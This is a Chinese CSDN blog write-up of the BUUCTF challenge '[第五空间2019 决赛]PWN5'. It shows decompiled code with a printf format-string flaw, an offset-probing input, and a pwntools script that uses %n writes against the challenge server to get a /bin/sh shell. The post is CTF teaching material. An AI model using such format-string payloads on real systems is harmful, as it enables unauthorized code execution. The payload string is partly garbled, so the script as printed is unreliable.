[第五空间2019 决赛]PWN5

最新推荐文章于 2024-03-15 22:46:13 发布
最新推荐文章于 2024-03-15 22:46:13 发布
阅读量138 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44982854/article/details/129350070
版权

[第五空间2019 决赛]PWN5

这里以一个pwn题作为例子,该逆向后的函数结构比自我构建的函数要困难,不再进行我自己编写,直接分析题目。该pwn题涉及搜索中漏洞问题。

1.查看保护机制

在这里插入图片描述

2.ida逆向后的源码

int __cdecl main(int a1)
{
unsigned int v1; // eax
int result; // eax
int fd; // [esp+0h] [ebp-84h]
char nptr[16]; // [esp+4h] [ebp-80h] BYREF
char buf[100]; // [esp+14h] [ebp-70h] BYREF
unsigned int v6; // [esp+78h] [ebp-Ch]
int *v7; // [esp+7Ch] [ebp-8h]
v7 = &a1;
v6 = __readgsdword(0x14u);
setvbuf(stdout, 0, 2, 0);
v1 = time(0);
srand(v1);
fd = open(“/dev/urandom”, 0);
read(fd, &dword_804C044, 4u);
printf(“your name:”);
read(0, buf, 0x63u);
printf(“Hello,”);
printf(buf);
printf(“your passwd:”);
read(0, nptr, 0xFu);
if ( atoi(nptr) == dword_804C044 )
{
puts(“ok!!”);
system(“/bin/sh”);
}
else
{
puts(“fail”);
}
result = 0;
if ( __readgsdword(0x14u) != v6 )
sub_80493D0();
return result;
}

3.因为no pie所以直接可以格式化字符串篡改atoi为system在这里插入图片描述

正好程序里有system函数,该system函数可以直接进行提权,拿到系统权限

这个命如果传入的password值为/bin/sh
这样原本的atoi(nptr)就变成了system(“/bin/sh”)
这样就可以得到shell了
令可调用系统函数,如果能使程序运行到这一步,就能够实现提权。

4.探测格式化字符串进行选择:

输入:AAAA-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x
A的ASCII码为65(0x41),因此0x41414141即为AAAA存入地址
在这里插入图片描述

5.偏移是10,并用ida查找unk_804C044地址为0x0804C044,编写攻击脚本,实现漏洞利用。在这里插入图片描述

from pwn import *
p = remote(“node4.buuoj.cn”, 25339)
payload = p32(0x804c044) + p32(0x804c045) + p32(0x804c046) + p32(0x804c047) + ‘%10 n n%11 nn%12 n n%13 nn’
p.sendafter(“name:”,payload)
p.sendafter(“passwd”,str(0x10101010))
p.interactive()

6.得到flag

在这里插入图片描述

分析代码调用结构:
在这里插入图片描述

从上图可以看到
在这里插入图片描述

调用read函数,将读入的数据压入eax寄存器中
add esp,10H; //释放局部变量空间
在这里插入图片描述

调用atoi函数(将函数转字符串),讲eax的内容压到edx中,将unk_804C044压入eax寄存器,以eax里面的值做为地址,取出来给eax,将这个地址值与你输入的值进行对比,如果相同则跳转到
在这里插入图片描述

如果失败则跳转到
在这里插入图片描述

无论如何跳转,都会执行loc_804933E这个函数

分析与上面类似,仍是跳转。
在这里插入图片描述

kubopiy
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
writeUP-[第五空间2019 决赛]PWN5(待进一步完善待研究内容)
weixin_52111404的博客
08-02 2226
通过PWN5一题尝试理解格式化字符串漏洞。
buuctf之[第五空间2019 决赛]PWN5
最新发布
weixin_54452942的博客
04-01 628
简单易懂~
BUUCTF [第五空间2019 决赛]PWN5
红叶的博客
10-31 1403
输入探测格式化字符串的payload,AAAA-%x-%x-%x-%x-%x,A的ASCII码值为65(0x41),因此是图中选中的段。通过 fmtstr_payload 将 dword_804C044 的内容替换为0x1,而非随机数。因为我们已经知道偏移量了,可以使用pwntools的 fmtstr_payload 函数。但是这次是将 dword_804C044 修改为任意值,然后再次输入此值即可获取shell。或者还有一个,AAAA-%p-%p-%p-%p-%p-%p,32位64位通用。
[CTF][第五空间2019 决赛]PWN5 1
凉水的博客
12-09 1117
解题思路 反编译后的源码: srand(__seed); // 生成随机数 iVar1 = open("/dev/urandom",0); read(iVar1,&DAT_0804c044,4); printf("your name:"); // 读取输入 read(0,local_78,99); printf("Hello,"); // 打印输入 printf(local_78); printf("your passwd:"); read(0,loc
[BUUCTF]PWN——[第五空间2019 决赛]PWN5
BangSen1的博客
03-25 4401
[第五空间2019 决赛]PWN5 例行检查,32位,开启了canary保护和NX保护。 运行一下。 IDA打开,看到了/bin/sh,但开启了保护 查看主函数,函数的功能是读入一个4位的随机密码,再将我们输入的密码与随机生成数比较,相同就执行system 这里面的printf()存在格式化字符串漏洞 按我的理解就是输入的参数的个数是不固定的,是由前面的格式化字符串决定的,所以我们只要控制了前面的格式化字符串,再结合一些参数,后面输出什么就是由我们决定的;如: %d 用于读取10进制数值 %x
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
2020年第五空间.zip
07-20
2020年第五空间 比赛逆向 pwn等赛题,除web题外所有赛题均有,含wp,麒麟系统wp。
【Pwn】fuzzerinstrospector(首届数字空间安全攻防大赛)
07-16
【Pwn】fuzzerinstrospector 是首届数字空间安全攻防大赛中的一项挑战,这个比赛旨在测试参赛者在信息安全领域的技能,特别是针对软件漏洞的发现和利用能力。在这个特定的挑战中,参赛者可能需要使用模糊测试...
browser_pwn:浏览器pwn,现在主要工作
03-22
浏览器Pwn,顾名思义,是指针对浏览器的安全攻防技术,主要集中在发现并利用浏览器中的漏洞进行攻击。在这个领域,V8_pwn 和 JSC_pwn 是两个关键的子领域,分别关注Google Chrome浏览器的V8 JavaScript引擎和Apple ...
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
BUUCTF--pwn--[第五空间2019 决赛]PWN5【格式化字符串】
qq_73149934的博客
12-10 792
BUUCTF--pwn--[第五空间2019 决赛]PWN5
[BUUCTF]-PWN:[第五空间2019 决赛]PWN5解析
2301_79326813的博客
12-14 338
这里之所以能这样利用是利用了动态链接的延迟绑定,当函数第一次调用时会把该函数真正的地址写入got表内,之后的调用都会从got表内存的地址去调用,大致是plt->got->addr,atoi的plt表里存的是atoi的got地址,atoi的got里存的是atoi在程序中的真正地址,我们修改atoi的got的内容,那他在调用atoi的plt时就会直接调用system的plt,system的plt就会调用system的got,从而实现调用system函数。这里有大致有两种思路,都运用了格式化字符串漏洞。
BUUCTF Pwn [第五空间2019 决赛]PWN5
MrTreebook的博客
12-25 981
BUUCTF Pwn [第五空间2019 决赛]PWN51.题目下载地址2.checksec2.IDA分析4.exp 1.题目下载地址 点击下载 2.checksec 开启了canary 没有PIE 2.IDA分析 查看主函数,函数的功能是读入一个4位的随机密码,再将我们输入的密码与随机生成数比较,相同就执行system 这里面的printf()存在格式化字符串漏洞 1.利用 "AAAA %08x %08x %8x %08x %08x %08x %08x………… ",这样的字符串来找到我们输入
buuctf——[第五空间2019 决赛]PWN51 利用格式化字符串漏
2301_81505831的博客
03-15 401
首先,我们在终端上输入 ./pwn,然后利用AAAA %x %x %x %x %x %x %x %x %x %x %x %x %x的形式来计算偏移量:可以数出0x41414141是格式化字符串的第10个参数,之后只要修改dword_804c044的值,让输入和dword_804c044的值一样就可以了。打开靶机,下载文件,检查文件类型,可以看到是32位程序,开启了Canary保护,不能使用栈溢出。放进ida32位可以看到如下代码。最后的最后,附带一些参考博客。用gpt分析以上程序。最后我们便得出了代码。
【BUU】[第五空间2019 决赛]PWN5
bzduanlei的博客
07-31 413
一、前置知识 1、%n,不输出字符,但是把已经成功输出的字符个数写入对应的整型指针参数所指的变量。 2、如何确定存储格式化字符串的地址是 printf 将要输出的第几个参数? ​ 运行程序后,在格式化字符串漏洞的位置输入AAAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p,看AAAA的数值对应在格式化字符串的第几个参数。 可以看到,AAAA对应的数值0x41414141在格式化字符串的第10个参数。 二、解题思路 0x01 分析文件 0x02 拖入IDA 3
BUUCTF-PWN-[第五空间2019 决赛]PWN5
m0_64180167的博客
04-17 465
这题考到 格式化字符串的方法 我之前没有学过 根据wp写完这题去看看原理下载打开环境checksec看看发现有三个保护 nx打开 所以无法写入shellcode现在看看ida32发现/bin/sh进去看发现就在主函数里面我们进行代码审计 发现输入名字 他会返回名字 然后再输入密码 如果密码和unk_804c044一样 输出shellcode我们看看这个函数是什么搜索一下发现是随机数 这样我们就无法通过判断得到shellcode我们现在又两个方法。
buuctf pwn 第五空间决赛pwn5
09-28
buuctf pwn 第五空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存中的数据,从而导致程序行为异常或者攻击者获取敏感信息。在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值